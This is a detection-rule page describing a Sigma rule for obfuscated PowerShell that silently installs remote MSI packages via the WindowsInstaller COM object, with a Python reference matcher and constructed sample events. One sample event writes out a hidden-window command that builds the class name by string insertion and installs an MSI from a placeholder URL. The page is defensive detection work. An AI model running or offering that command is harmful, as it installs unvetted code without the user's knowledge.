
Obfuscated PowerShell MSI Install via WindowsInstaller COM

Severity: high
Author: Meroujan Antonyan (vx3r)
Source: upstream

Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of InstallProduct and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.

MITRE ATT&CK coverage

Tactic | Techniques
Execution | T1059.001 Command and Scripting Interpreter: PowerShell
Defense Evasion | T1027.010 Obfuscated Files or Information: Command Obfuscation; T1218.007 System Binary Proxy Execution: Msiexec

Event coverage

Provider | Event ID | Title
Sysmon | 1 | Process creation

Stages and Predicates

Stage 1: all of selection_img

or:
  Image|endswith: '\powershell.exe'
  Image|endswith: '\powershell_ise.exe'
  Image|endswith: '\pwsh.exe'
  OriginalFileName: 'PowerShell.EXE'
  OriginalFileName: 'PowerShell_ISE.EXE'
  OriginalFileName: 'pwsh.dll'

Stage 2: all of selection_cli

  CommandLine|contains: '-ComObject'
  CommandLine|contains: '.Insert('
  CommandLine|contains: 'InstallProduct('
  CommandLine|contains: 'UILevel'
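A reference implementation of the two stages above, added here as an example (it is not the catalog's or Sigma's own code); the Sysmon events are constructed and the download URL host is a placeholder:

```python
# Added example: a minimal reference implementation of this rule's two stages
# (not the catalog's or Sigma's own code). Field names follow Sysmon Event ID 1
# as Sigma sees them; matching is case-insensitive, Sigma's default for strings.

IMAGE_SUFFIXES = ("\\powershell.exe", "\\powershell_ise.exe", "\\pwsh.exe")
ORIGINAL_FILE_NAMES = ("powershell.exe", "powershell_ise.exe", "pwsh.dll")
CLI_TOKENS = ("-comobject", ".insert(", "installproduct(", "uilevel")

def stage1_image(event: dict) -> bool:
    """selection_img: any Image suffix OR any OriginalFileName value."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith(IMAGE_SUFFIXES) or original in ORIGINAL_FILE_NAMES

def stage2_cli(event: dict) -> bool:
    """selection_cli: CommandLine must contain all four substrings."""
    cli = event.get("CommandLine", "").lower()
    return all(token in cli for token in CLI_TOKENS)

def matches(event: dict) -> bool:
    """condition: both selections must hold (all of selection_*)."""
    return stage1_image(event) and stage2_cli(event)

# Constructed sample events; the URL host is a placeholder, not an indicator.
SAMPLE_EVENTS = [
    {  # the obfuscated pattern the rule describes: fires
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -w hidden -c \"$i=New-Object -ComObject "
                       "('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;"
                       "$i.InstallProduct('https://example.invalid/setup.msi')\"",
    },
    {  # renamed pwsh binary: stage 1 still holds via OriginalFileName, but the
        # plain (non-obfuscated) class name has no .Insert( so stage 2 fails
        "Image": "C:\\Users\\Public\\svc.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": "svc.exe -c \"$i=New-Object -ComObject WindowsInstaller.Installer;"
                       "$i.UILevel=2;$i.InstallProduct('https://example.invalid/a.msi')\"",
    },
    {  # benign string manipulation without COM or InstallProduct: no match
        "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": "pwsh.exe -c \"'ello'.Insert(0,'h')\"",
    },
]
```

The second event shows the rule's tuning: a renamed interpreter is still caught by OriginalFileName, but an un-obfuscated COM install is deliberately out of scope because stage 2 requires all four substrings.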

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

Field | Kind | Values
CommandLine | match |
  • -ComObject corpus 2 (sigma 2)
  • .Insert(
  • InstallProduct( corpus 2 (sigma 2)
  • UILevel
Image | ends_with |
  • \powershell.exe corpus 143 (sigma 143)
  • \powershell_ise.exe corpus 27 (sigma 27)
  • \pwsh.exe corpus 140 (sigma 140)
OriginalFileName | eq |
  • PowerShell.EXE corpus 64 (sigma 60, splunk 4)
  • PowerShell_ISE.EXE corpus 6 (sigma 6)
  • pwsh.dll corpus 72 (sigma 68, splunk 4)